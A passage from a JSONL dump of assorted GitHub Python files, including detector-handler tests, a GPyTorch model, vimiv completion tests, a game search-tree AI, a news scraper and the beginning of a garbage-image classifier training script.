\")\r\n\t\tf.write(\"\\n\")\r\n\t\r\n\t\r\n\tf.close()\t\r\n\t","repo_name":"ericmintun/miscellaneous","sub_path":"OCR/SelfImplementation/OCR_1Layer.py","file_name":"OCR_1Layer.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6739295480","text":"from area_detector_handlers.tests.conftest import select_handler\n\n\n@select_handler(\"XSP3_FLY\")\ndef test_bulk(xs3file, handler):\n (fname, kwargs), (N_points, N_chans, N_bin, N_roi) = xs3file\n\n with handler(fname, **kwargs) as h:\n assert h().shape == (N_points, N_chans, N_bin)\n assert h(target=\"data\").shape == (N_points, N_chans, N_bin)\n for chan in range(1, N_chans + 1):\n for roi in range(1, N_roi + 1):\n assert h(target=f\"CHAN{chan}ROI{roi}\").shape == (N_points,)\n assert h(target=f\"CHAN{chan}ROI{roi}HLM\").shape == (N_points,)\n assert h(target=f\"CHAN{chan}ROI{roi}LLM\").shape == (N_points,)\n\n assert h.get_file_list(()) == (fname,)\n\n\n@select_handler(\"XSP3\")\ndef test_pre_pixel(xs3file, handler):\n (fname, kwargs), (N_points, N_chans, N_bin, N_roi) = xs3file\n\n with handler(fname, **kwargs) as h:\n for frame in range(0, N_points):\n for chan in range(1, N_chans + 1):\n assert h(frame=frame, channel=chan).shape == (N_bin,)\n assert h.get_file_list(()) == (fname,)\n","repo_name":"bluesky/area-detector-handlers","sub_path":"area_detector_handlers/tests/test_xs3.py","file_name":"test_xs3.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29126465469","text":"############################# MY NEURAL NETWORK MODEL (TEST) #############################\n\nimport numpy as np # allows scienftific computing \nimport pandas as pd # allows easy manipulation of data structures \nfrom train import NeuralNetwork # my very first Neural Network model\nfrom pandas import DataFrame as df \nimport matplotlib.pyplot as plt\n\nlearning_rate = 0.01\niterations = 100000\nloaded_model = NeuralNetwork(learning_rate, iterations)\n\ndf = pd.read_csv(\"basic_nn/train_data.csv\") # add train data\ntrain_data = df.drop([\"Species\"], axis = 1)\ntrain_results = df.Species\ntrain_data = np.array(train_data)\ntrain_results = np.array(train_results)\n\nnf = pd.read_csv(\"basic_nn/test_data.csv\") # add test data\ntest_data = nf.drop([\"Species\"], axis = 1)\ntest_results = nf.Species\ntest_data = np.array(test_data)\ntest_results =np.array(test_results)\n\n# test_errors, final_weights, final_bias = loaded_model.train(test_data, test_results, iterations)\n# print('final weights = ', final_weights)\n# print('final ias = ', final_bias)\n\n# sonuçta bulunan ağırlık değerleri aşağıdaki gibidir:\n\nfinal_weights =[-0.21989351, -0.26251323, 0.46154674, 0.53166462]\nfinal_bias = 0.510874753594822\n\n############################# test data controlling ############################\n\ntest_data_pred = loaded_model.test_function(test_data, final_weights, final_bias)\nif (test_results == test_data_pred).any():\n print(\"The test results are Correct!\")\nelse:\n print(\"The test results are False!\")\n\n######################### new data prediction ###############################\n\nnew_data = list(map(float, input(\"\\n Enter the numbers: \").strip().split()))[:4]\n\nif len(new_data) < 4:\n print(\"you entered less than 4 feature. please give only 4 feature data!\") \nelif len(new_data) > 4:\n print(\"you entered more than 4 feature. please give only 4 feature data!\")\nnew_data_result = loaded_model.new_data_prediction(new_data, final_weights, final_bias)\nprint(new_data_result)\n\n################################ error graph ####################################\n\n# test_errors, final_weights, final_bias = loaded_model.train(test_data, test_results, iterations)\n# plt.plot(test_errors)\n# plt.xlabel('iterations')\n# plt.ylabel('error for all the training instances')\n# plt.show()\n","repo_name":"sudeakinay/MLP-from-scratch","sub_path":"perceptron/perceptron-test.py","file_name":"perceptron-test.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"71068362348","text":"#!/usr/bin/env python\n\nimport os\nimport glob\nimport shutil\n\nList = os.walk('.').next()[1]\n\nfor files in List:\n with open(files + '/' + files +'_bulk.out') as f:\n for line in f:\n if 'Function evaluations' in line:\n niter = line.split()[2]\n list_calc = glob.glob(files + '/calcdir-*')\n for lc in list_calc:\n if not niter in lc:\n shutil.rmtree(lc)\n \n","repo_name":"mamunm/Bimetallic_Alloy_Codes","sub_path":"bulk_optimization/AB/fmin/delete_all_calcdir_except_last.py","file_name":"delete_all_calcdir_except_last.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7574395218","text":"def mostfrequant(array):\n # array.sort()\n # max1 = 0\n # key = 0\n # for i in range(len(array)-1):\n # count = 0 \n # while array[i] == array[i+1]:\n # count+=1\n # i+=1\n # if count > max1:\n # max1 = count\n # key = array[i]\n # return key\n hashtable = {}\n\n for element in array:\n if element in hashtable:\n hashtable[element] += 1\n else:\n hashtable[element] = 1\n \n max1 = 0\n key1 = 0\n for key,value in hashtable.items():\n if value > max1:\n max1 = value\n key1 = key\n return key1\n\n\nprint(mostfrequant([1,2,3,1,1,4,2,2,3,3]))","repo_name":"aakash823/DSAlgo","sub_path":"practiceques/mostfrequantelement.py","file_name":"mostfrequantelement.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34157887286","text":"'''\nModel for exact GP\nShall support multiple acquisition functions:\nUCB, TS, (q)EI.\n'''\nimport gpytorch\n\nclass ExactGPRegressionModel(gpytorch.models.ExactGP):\n def __init__(self, train_x, train_y, gp_likelihood, gp_feature_extractor, low_dim=True):\n '''\n Exact GP:\n Leave placeholder for gp_feature_extractor\n '''\n super(ExactGPRegressionModel, self).__init__(train_x, train_y, gp_likelihood)\n # self.mean_module = gpytorch.means.ZeroMean()\n if low_dim:\n self.covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel())\n else:\n self.covar_module = gpytorch.kernels.LinearKernel(num_dims=train_x.size(-1))\n try: # gpytorch 1.6.0 support\n self.mean_module = gpytorch.means.ConstantMean(constant_prior=train_y.mean())\n except Exception: # gpytorch 1.9.1\n self.mean_module = gpytorch.means.ConstantMean()\n # self.covar_module = gpytorch.kernels.GridInterpolationKernel(\n # gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel(ard_num_dims=1)),\n # num_dims=train_x.size(-1), grid_size=1000)\n # self.covar_module = gpytorch.kernels.GridInterpolationKernel(\n # gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel(ard_num_dims=1),\n # outputscale_constraint=gpytorch.constraints.Interval(0.7,1.0)),\n # num_dims=train_x.size(-1), grid_size=100)\n\n # This module will scale the NN features so that they're nice values\n self.scale_to_bounds = gpytorch.utils.grid.ScaleToBounds(-1., 1.)\n\n def forward(self, x):\n # self.projected_x = x\n self.projected_x = self.scale_to_bounds(x) # Make the values \"nice\"\n\n mean_x = self.mean_module(self.projected_x)\n covar_x = self.covar_module(self.projected_x)\n return gpytorch.distributions.MultivariateNormal(mean_x, covar_x)","repo_name":"SchroDeCat/LLNL","sub_path":"src/models/exact_gp.py","file_name":"exact_gp.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2010114241","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\"\"\"Completion tests for vimiv's test suite.\"\"\"\n\nimport os\nimport shutil\nfrom unittest import main\n\nfrom vimiv.trash_manager import TrashManager\n\nfrom vimiv_testcase import VimivTestCase\n\n\nclass CompletionsTest(VimivTestCase):\n \"\"\"Completions Tests.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.init_test(cls)\n cls.completions = cls.vimiv[\"completions\"]\n\n def test_internal_completion(self):\n \"\"\"Completion of internal commands.\"\"\"\n self.vimiv[\"commandline\"].set_text(\":a\")\n self.completions.complete()\n expected_completions = [\"accept_changes\", \"alias\", \"autorotate\"]\n liststore = self.completions.get_model()\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n # Internal completion with a prefixed digit\n self.vimiv[\"commandline\"].set_text(\":5a\")\n self.completions.complete()\n expected_completions = [\"accept_changes\", \"alias\", \"autorotate\"]\n liststore = self.completions.get_model()\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n\n def test_external_completion(self):\n \"\"\"Completion of external commands. Currently none.\"\"\"\n self.vimiv[\"commandline\"].set_text(\":!vimi\")\n self.completions.complete()\n liststore = self.completions.get_model()\n self.assertFalse(len(liststore))\n\n def test_external_path_completion(self):\n \"\"\"Completion of paths for external commands.\"\"\"\n # One path\n self.vimiv[\"commandline\"].set_text(\":!mv vi\")\n expected_completions = [\"!mv vimiv/\"]\n liststore = self.completions.get_model()\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n # Two paths\n self.vimiv[\"commandline\"].set_text(\":!mv % vi\")\n expected_completions = [\"!mv % vimiv/\"]\n liststore = self.completions.get_model()\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n # Do not complete arguments\n self.vimiv[\"commandline\"].set_text(\":!mv -\")\n self.completions.complete()\n liststore = self.completions.get_model()\n self.assertFalse(len(liststore))\n\n def test_path_completion(self):\n \"\"\"Completion of paths.\"\"\"\n self.vimiv[\"commandline\"].set_text(\":./vimiv/testimages/ar\")\n self.completions.complete()\n expected_completions = [\"./vimiv/testimages/arch-logo.png\",\n \"./vimiv/testimages/arch_001.jpg\"]\n liststore = self.completions.get_model()\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n # Expand home\n self.settings.override(\"show_hidden\", \"true\")\n self.vimiv[\"commandline\"].set_text(\":~/.loca\")\n liststore = self.completions.get_model()\n completions = []\n for row in liststore:\n completions.append(row[0])\n self.assertIn(\"~/.local/\", completions)\n self.settings.override(\"show_hidden\", \"false\")\n\n def test_tag_completion(self):\n \"\"\"Completion of tags.\"\"\"\n # Create one tag\n new_tagfile = os.path.join(self.vimiv[\"tags\"].directory, \"testfile\")\n with open(new_tagfile, \"w\") as f:\n f.write(os.path.abspath(\"vimiv/testimages/arch-logo.png\"))\n tagfiles = os.listdir(self.vimiv[\"tags\"].directory)\n self.vimiv[\"commandline\"].set_text(\":tag_load \")\n self.completions.complete()\n liststore = self.completions.get_model()\n expected_completions = [\"tag_load \" + tag for tag in tagfiles]\n for row in liststore:\n self.assertIn(row[0], expected_completions)\n self.assertEqual(len(liststore), len(expected_completions))\n\n def test_trash_completion(self):\n \"\"\"Completion of files in trash.\"\"\"\n # Create one image file in trash and one with a similar name but not an\n # image\n # The completion is supposed to be unique as the non-image is ignored\n trash_directory = TrashManager().get_files_directory()\n trashed_file = os.path.join(trash_directory, \"arch-logo.png\")\n shutil.copy(\"vimiv/testimages/arch-logo.png\", trash_directory)\n with open(os.path.join(trash_directory, \"arch-logo.txt\"), \"w\") as f:\n f.write(\"test\\n\")\n self.vimiv[\"commandline\"].set_text(\":undelete \")\n self.completions.complete()\n expected_text = \":undelete arch-logo.png\"\n self.assertEqual(expected_text, self.vimiv[\"commandline\"].get_text())\n # Clean up\n os.remove(trashed_file)\n\n def test_tabbing(self):\n \"\"\"Tabbing through completions.\"\"\"\n # Complete to last matching character\n self.vimiv[\"commandline\"].set_text(\":co\")\n self.completions.complete()\n expected_text = \":copy_\"\n received_text = self.vimiv[\"commandline\"].get_text()\n self.assertEqual(expected_text, received_text)\n # First result\n liststore = self.completions.get_model()\n self.vimiv[\"completions\"].complete()\n expected_text = \"copy_abspath\"\n selected_path = self.completions.get_cursor()[0]\n selected_index = selected_path.get_indices()[0]\n selected_text = liststore[selected_index][0]\n self.assertEqual(expected_text, selected_text)\n # Second result\n self.vimiv[\"completions\"].complete()\n expected_text = \"copy_basename\"\n selected_path = self.completions.get_cursor()[0]\n selected_index = selected_path.get_indices()[0]\n selected_text = liststore[selected_index][0]\n self.assertEqual(expected_text, selected_text)\n # First again\n self.vimiv[\"completions\"].complete(inverse=True)\n expected_text = \"copy_abspath\"\n selected_path = self.completions.get_cursor()[0]\n selected_index = selected_path.get_indices()[0]\n selected_text = liststore[selected_index][0]\n self.assertEqual(expected_text, selected_text)\n # Now activate the completion\n self.completions.emit(\"row-activated\",\n self.completions.get_cursor()[0], None)\n entry_text = self.vimiv[\"commandline\"].get_text()\n expected_text = \":copy_abspath\"\n self.assertEqual(expected_text, entry_text)\n\n def test_best_match_with_prefix(self):\n \"\"\"Complete to best match with a prefixed number.\"\"\"\n # Complete to last matching character\n self.vimiv[\"commandline\"].set_text(\":2co\")\n self.completions.complete()\n expected_text = \":2copy_\"\n received_text = self.vimiv[\"commandline\"].get_text()\n self.assertEqual(expected_text, received_text)\n\n def test_selections(self):\n \"\"\"Initial selection when tabbing through completions.\"\"\"\n self.vimiv[\"commandline\"].enter()\n # No cursor yet\n cursor = self.completions.get_cursor()[0]\n self.assertIsNone(cursor)\n # Tab should start at index 0\n self.completions.complete()\n cursor = self.completions.get_cursor()[0]\n self.assertIsNotNone(cursor)\n index = cursor.get_indices()[0]\n self.assertEqual(index, 0)\n # Re-open the completion\n self.completions.hide()\n self.completions.reset()\n self.vimiv[\"commandline\"].set_text(\":\")\n self.completions.show()\n # No cursor again\n cursor = self.completions.get_cursor()[0]\n self.assertIsNone(cursor)\n # Inverse Tab should start at index -1\n self.completions.complete(True)\n cursor = self.completions.get_cursor()[0]\n self.assertIsNotNone(cursor)\n index = cursor.get_indices()[0]\n last = len(self.completions.get_model()) - 1\n self.assertEqual(index, last)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"karlch/vimiv","sub_path":"tests/completions_test.py","file_name":"completions_test.py","file_ext":"py","file_size_in_byte":8191,"program_lang":"python","lang":"en","doc_type":"code","stars":259,"dataset":"github-code","pt":"37"} +{"seq_id":"28720705961","text":"import os\r\nimport argparse\r\nimport torch\r\nfrom data import ScrewholeDataset\r\nfrom torch.utils.data import DataLoader\r\nfrom utils import *\r\nfrom train import train_1, train_2\r\nfrom test import *\r\n\r\ndef argparser(parser):\r\n #parser.add_argument('--image_path', default='.\\\\test_images', type=str)\r\n parser.add_argument('--image_path', default='.\\\\train_images\\\\withBG', type=str)\r\n parser.add_argument('--start_epoch', default=0, type=int)\r\n parser.add_argument('--num_class_1', default=4, type=int)\r\n parser.add_argument('--num_class_2', default=1, type=int)\r\n parser.add_argument('--resume_1', default=\".\\\\weights_1\\\\checkpoint_17.pth\", type=str)\r\n parser.add_argument('--resume_2', default=None, type=str)\r\n parser.add_argument('--test', default=False, type=bool)\r\n parser.add_argument('--train_1', default=False, type=bool)\r\n parser.add_argument('--train_2', default=True, type=bool)\r\n parser.add_argument('--num_epoch', default=5000, type=int,\r\n help='Epoch number for training')\r\n parser.add_argument('--batch_size', default=1, type=int)\r\n parser.add_argument('--weight_folder_1', default='.\\\\weights_1', type=str)\r\n parser.add_argument('--weight_folder_2', default='.\\\\weights_2', type=str)\r\n parser.add_argument('--gpu', default=0, type=int,\r\n help='GPU id to use. If you want to use only CPU, set None.')\r\n parser.add_argument('--optim', default='AdamW', type=str,\r\n help='SGD or Adam or AdamW')\r\n parser.add_argument('--lr', '--learning-rate', default=1e-4, type=float,\r\n help='initial learning rate')\r\n parser.add_argument('--momentum', default=0.9, type=float,\r\n help='Momentum value for optim')\r\n parser.add_argument('--weight_decay', default=1e-4, type=float,\r\n help='Weight decay for SGD')\r\n parser.add_argument('--grad_accumulation_steps', default=1, type=int,\r\n help='Number of gradient accumulation steps')\r\n parser.add_argument('--equation_find', default=False, type=bool)\r\n parser.add_argument('--xyplot', default=True, type=bool)\r\n parser.add_argument('--patch_show', default=False, type=bool)\r\n parser.add_argument('--lineplot', default=False, type=bool)\r\n args = parser.parse_args()\r\n return args\r\n\r\ndef main(args):\r\n ### Data parsing ###\r\n print('data loading...')\r\n\r\n dataset = ScrewholeDataset(args.image_path)\r\n data_loader = DataLoader(dataset, batch_size=args.batch_size,\r\n shuffle = True,\r\n drop_last = False)\r\n print('data loaded.')\r\n \r\n \r\n # Load model, optimizer, scheduler, checkpoint\r\n model_1, model_2 = get_model(args)\r\n \r\n checkpoint_1, checkpoint_2, args = weight_load(args)\r\n\r\n\r\n if len(checkpoint_1) != 0:\r\n model_1.load_state_dict(checkpoint_1['state_dict'])\r\n #print('###### model architecture #######')\r\n #print(model)\r\n del checkpoint_1\r\n if len(checkpoint_2) != 0:\r\n model_2.load_state_dict(checkpoint_2['state_dict'])\r\n del checkpoint_2\r\n\r\n if args.gpu is not None:\r\n print('Use GPU: {}'.format(args.gpu))\r\n torch.cuda.set_device(args.gpu)\r\n model_1.cuda(args.gpu)\r\n model_2.cuda(args.gpu)\r\n\r\n iters_per_epoch = int(len(dataset)/args.batch_size)\r\n if args.xyplot:\r\n xy_plot(data_loader,model_1,iters_per_epoch, args)\r\n if args.lineplot:\r\n line_plot(data_loader,model_1, model_2, iters_per_epoch, args)\r\n \r\n if args.train_1:\r\n optimizer_1 = get_optimizer(args, model_1)\r\n scheduler_1 = get_scheduler(args, optimizer_1)\r\n for epoch in range(args.start_epoch, args.num_epoch):\r\n \r\n loss = train_1(data_loader, model_1, scheduler_1, optimizer_1, epoch, args, iters_per_epoch)\r\n if (epoch + 1) % 5 == 0:\r\n pass #validation is not developed yet\r\n state = {\r\n 'epoch': epoch,\r\n 'parser': args,\r\n 'state_dict':get_state_dict(model_1)\r\n }\r\n torch.save(\r\n state,\r\n os.path.join(\r\n args.weight_folder_1,\r\n \"checkpoint_{}.pth\".format(epoch)\r\n )\r\n )\r\n \r\n elif args.train_2:\r\n optimizer_2 = get_optimizer(args, model_2)\r\n scheduler_2 = get_scheduler(args, optimizer_2)\r\n for epoch in range(args.start_epoch, args.num_epoch):\r\n loss = train_2(data_loader, model_1, model_2, scheduler_2, optimizer_2, epoch, args, iters_per_epoch)\r\n if (epoch + 1) % 3 == 0:\r\n pass #validation is not developed yet\r\n state = {\r\n 'epoch': epoch,\r\n 'parser': args,\r\n 'state_dict':get_state_dict(model_2)\r\n }\r\n torch.save(\r\n state,\r\n os.path.join(\r\n args.weight_folder_2,\r\n \"checkpoint_{}.pth\".format(epoch)\r\n )\r\n )\r\n else:\r\n pass #test is not developed yet\r\n\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='Fiding normal vector equations in screw hole images')\r\n args = argparser(parser) #set argument\r\n torch.cuda.empty_cache()\r\n\r\n if(not os.path.exists(args.weight_folder_1)):\r\n os.makedirs(args.weight_folder_1)\r\n if(not os.path.exists(args.weight_folder_2)):\r\n os.makedirs(args.weight_folder_2)\r\n print('start epoch: {}'.format(args.start_epoch))\r\n print('total epoch: {}'.format(args.num_epoch))\r\n print('batch size: {}'.format(args.batch_size))\r\n main(args)","repo_name":"hwarangkim/20220619-Volt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26629542994","text":"valores = list()\nlista_par = list()\nlista_impar = list()\nwhile True:\n n = int(input('Digite um número: '))\n if n not in valores:\n valores.append(n)\n if n % 2 == 0:\n lista_par.append(n)\n else:\n lista_impar.append(n)\n resp = str(input('Quer continuar? [S/N] '))\n if resp in \"Nn\":\n break\n\nprint(f'A lista completa é {valores}')\nprint(f'A lista de pares é {lista_par}')\nprint(f'A lista de ímpares é {lista_impar}')","repo_name":"christianmesaque/Python_Exercicios-","sub_path":"Mundo 3/ex082.py","file_name":"ex082.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74922381866","text":"from typing import List\nfrom multiprocessing import Value\n\nfrom chillow.service.ai.search_tree_node import SearchTreeRoot\nfrom chillow.service.ai.artificial_intelligence import ArtificialIntelligence\nfrom chillow.model.action import Action\nfrom chillow.model.game import Game\nfrom chillow.model.player import Player\n\n\nclass SearchTreeAI(ArtificialIntelligence):\n \"\"\"The SearchTreeAI tries to create a tree by simulating different actions for all player for the next rounds.\n\n If there is an initial action that lets the player survive for the next rounds not depending on which action\n the other players will make, this action will be chosen.\n\n Attributes:\n player: The player associated with this AI.\n \"\"\"\n\n def __init__(self, player: Player, depth: int, max_speed: int = 10, randomize: bool = False,\n distance_to_check: int = 0):\n \"\"\" Creates a new object of the SearchTreeAI.\n\n Args:\n player: The player assigned to the AI.\n max_speed: The maximum speed the AI can reach.\n depth: Depth pre-calculating actions.\n randomize: Indicating whether to calculate actions in tree in random order.\n distance_to_check:\n Distance an enemy player is allowed to be at maximum distance, so that he is taken into\n account in the calculations.\n \"\"\"\n\n super().__init__(player, max_speed)\n self.__depth = depth\n self.__randomize = randomize\n self.__distance_to_check = distance_to_check\n\n def get_information(self) -> str:\n \"\"\"See base class.\"\"\"\n return (super().get_information() +\n \", depth=\" + str(self.__depth) +\n \", randomize=\" + str(self.__randomize) +\n \", distance_to_check=\" + str(self.__distance_to_check))\n\n def create_next_action(self, game: Game, return_value: Value):\n \"\"\"See base class.\"\"\"\n self._turn_ctr += 1\n\n root = SearchTreeRoot(game.copy())\n player_ids_to_watch = game.get_other_player_ids(self.player, self.__distance_to_check, True)\n combinations = Action.get_combinations(len(player_ids_to_watch))\n\n action = root.calculate_action(self.player, player_ids_to_watch, combinations, self.__depth, self._turn_ctr,\n True, [], self._max_speed, self.__randomize)\n return_value.value = (action if action is not None else Action.get_random_action()).get_index()\n\n def create_all_next_surviving_actions(self, game: Game) -> List[Action]:\n \"\"\"Calculates not only one but all actions that will let the player survive for the next rounds.\n\n Args:\n game: The current state of the game.\n\n Returns:\n A list of actions which will let the player survive for the next rounds.\n \"\"\"\n\n root = SearchTreeRoot(game.copy())\n player_ids_to_watch = game.get_other_player_ids(self.player, self.__distance_to_check, True)\n combinations = Action.get_combinations(len(player_ids_to_watch))\n\n search_tree_actions = []\n\n for action in Action.get_actions():\n if root.calculate_action(self.player, player_ids_to_watch, combinations, self.__depth, self._turn_ctr, True,\n [action], self._max_speed, True) is not None:\n search_tree_actions.append(action)\n\n return search_tree_actions\n\n def _get_depth(self) -> int:\n return self.__depth\n\n def _get_distance_to_check(self) -> int:\n return self.__distance_to_check\n","repo_name":"jonashellmann/informaticup21-team-chillow","sub_path":"chillow/service/ai/search_tree_ai.py","file_name":"search_tree_ai.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"44016930805","text":"import hashlib\n\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\n\nfrom database.dbExecutor import dbExecutor\nimport sys\n\n\nNUM_PAGES_TO_CHECK = 1\nfirstRunBool = False\nmeseci = {'januar': '1.', 'februar': '2.', 'marec': '3.', 'april': '4.', 'maj': '5.',\n 'junij': '6.', 'julij': '7.', 'avgust': '8.', 'september': '9.',\n'oktober': '10.', 'november': '11.', 'december': '12.'}\n\n\ndef makeHash(articleTitle, dateStr):\n hash_object = hashlib.sha1((articleTitle+dateStr).encode(\"utf-8\"))\n\n return hash_object.hexdigest()\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\ndef log_error(e):\n\n print(e)\n\n\nclanki = []\nparent_link = (\"https://www.rtvslo.si\")\n\ndef uniformDateStr(dateStr, inputDateFromat=\"\"):\n if inputDateFromat == \"\":\n inputDateFromat = \"%d.%m.%Y\"\n return datetime.datetime.strptime(dateStr, inputDateFromat).strftime(\"%Y-%m-%d\")\n\n\n\n\n\ndef get_text(stran,SOURCE_ID):\n sqlBase = dbExecutor() # creates a sql database handler class\n todayDateStr = datetime.datetime.now().strftime(\"%Y-%m-%d\") # today date in the uniform format\n soup = BeautifulSoup(simple_get(\"https://www.rtvslo.si/lokalne-novice/ljubljana/arhiv/?&page=\"+str(stran)), \"html.parser\")\n all_links = soup.find_all(\"a\",{\"class\":\"title\"})\n prev_link = \"\"\n for links in all_links:\n if(prev_link == links): continue\n prev_link = links\n if(links.get(\"href\")==None): continue\n if(not re.match(\"http://+\",links.get(\"href\"))):\n #print(\"----------------------\")\n print(parent_link+links.get(\"href\"))\n soup = BeautifulSoup(simple_get(parent_link+links.get(\"href\")), \"html.parser\")\n tmp = soup.find(\"div\", {\"id\":\"newsbody\"})\n if(tmp == None): continue\n naslov = str(tmp.find(\"h1\").text)\n vse = tmp.find_all(\"p\")\n vsebina=\"\"\n\n for obj in vse:\n vsebina+=str(obj.text)+\"\\n\"\n dat = str(tmp.find(\"div\", {\"class\":\"info\"}).text)\n dat= dat.split()\n s=\"\"\n seq = (dat[0], meseci[dat[1]], dat[2])\n datum = uniformDateStr(s.join(seq))\n link = parent_link+links.get(\"href\")\n hashStr = makeHash(naslov, datum) # creates article hash from title and dateStr (HASH_VREDNOST)\n date_downloaded = todayDateStr # date when the article was downloaded\n\n if sqlBase.getByHash(hashStr) is None:\n # get article description/content\n description = vsebina\n # (date_created: string, caption: string, contents: string, date: string, hash: string, url: string, source: string)\n entry = (datum, naslov, description, date_downloaded, hashStr, link, SOURCE_ID)\n sqlBase.insertOne(entry) # insert the article in the database\n print(\"Inserted succesfuly\")\n\n\n\ndef get_articles( SOURCE_ID):\n stevilka_strani = 1\n now = datetime.datetime.now()\n get_text(stevilka_strani, SOURCE_ID)\n pagesChecked = 1\n while True:\n pagesChecked += 1\n print(stevilka_strani)\n stevilka_strani+=1\n get_text(stevilka_strani,SOURCE_ID)\n if not firstRunBool and pagesChecked >= NUM_PAGES_TO_CHECK:\n break\n\ndef main():\n get_articles(\"RTV-Ljubljana\")\n\n\nif __name__ == '__main__':\n # checks if the second argument is provided and is equal to \"-F\" - means first run\n if len(sys.argv) == 2 and sys.argv[1] == \"-F\":\n firstRunBool = True\n\n print (\"Add -F as the command line argument to execute first run command - downloads the whole history of articles from the page.\")\n\n main()","repo_name":"jurem/SLEDIMedO","sub_path":"scrapers/SCRAPER-RTV-Ljubljana.py","file_name":"SCRAPER-RTV-Ljubljana.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5933172576","text":"import torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport numpy as np\nimport time\nimport os\nimport pretrainedmodels\nimport torch.optim as optim\nfrom dataset import GarbageDataset\nfrom utils import Bar, Logger, AverageMeter, accuracy, savefig, get_optimizer, save_checkpoint, save_model\nfrom train_utils import train, test\nfrom nets import se_resnext101_32x4d\nfrom ops import FocalLoss\nfrom transform import get_train_transform\nfrom torch.utils.data import DataLoader\n# from torch.utils.tensorboard import SummaryWriter\n\nbest_acc = 0\nstart_epoch = 0\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\nnum_class = 40\nbatch_size = 256\ntot_epoch = 30\nlr = 1e-3\n\n# model\npretrainedmodel = 'se_resnext101_32x4d'\npretrainedmodel_path = './pretrain_models/se_resnext101_32x4d-3b2fe3d8.pth'\nmodel, train_layers = se_resnext101_32x4d(40, pretrainedmodel_path)\nmodel.to(device)\noptimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=lr)\n# criterion = FocalLoss(num_class).to(device)\ncriterion = nn.CrossEntropyLoss().to(device)\n# lr_scheduler = None\nlr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.2, patience=4, verbose=False)\n\n# ------------- Dataset ---------------\nclasses = (\n '其他垃圾/一次性快餐盒', '其他垃圾/污损塑料', '其他垃圾/烟蒂', '其他垃圾/牙签',\n '其他垃圾/破碎花盆及碟碗', '其他垃圾/竹筷',\n '厨余垃圾/剩饭剩菜', '厨余垃圾/大骨头', '厨余垃圾/水果果皮', '厨余垃圾/水果果肉',\n '厨余垃圾/茶叶渣', '厨余垃圾/菜叶菜根','厨余垃圾/蛋壳','厨余垃圾/鱼骨',\n '可回收物/充电宝','可回收物/包','可回收物/化妆品瓶','可回收物/塑料玩具',\n '可回收物/塑料碗盆','可回收物/塑料衣架',\n '可回收物/快递纸袋','可回收物/插头电线','可回收物/旧衣服',\n '可回收物/易拉罐','可回收物/枕头','可回收物/毛绒玩具','可回收物/洗发水瓶',\n '可��收物/玻璃杯','可回收物/皮鞋','可回收物/砧板','可回收物/纸板箱',\n '可回收物/调料瓶','可回收物/酒瓶','可回收物/金属食品罐','可回收物/锅',\n '可回收物/食用油桶','可回收物/饮料瓶',\n '有害垃圾/干电池','有害垃圾/软膏','有害垃圾/过期药物'\n)\nmean, std = [0.4995, 0.4642, 0.4140], [0.2771, 0.2705, 0.2660]\ntrain_dataset = GarbageDataset(\n './garbage_dataset_v1/train', \n './garbage_dataset_v1/train.csv', \n transforms=get_train_transform(mean, std, 224)\n)\nval_dataset = 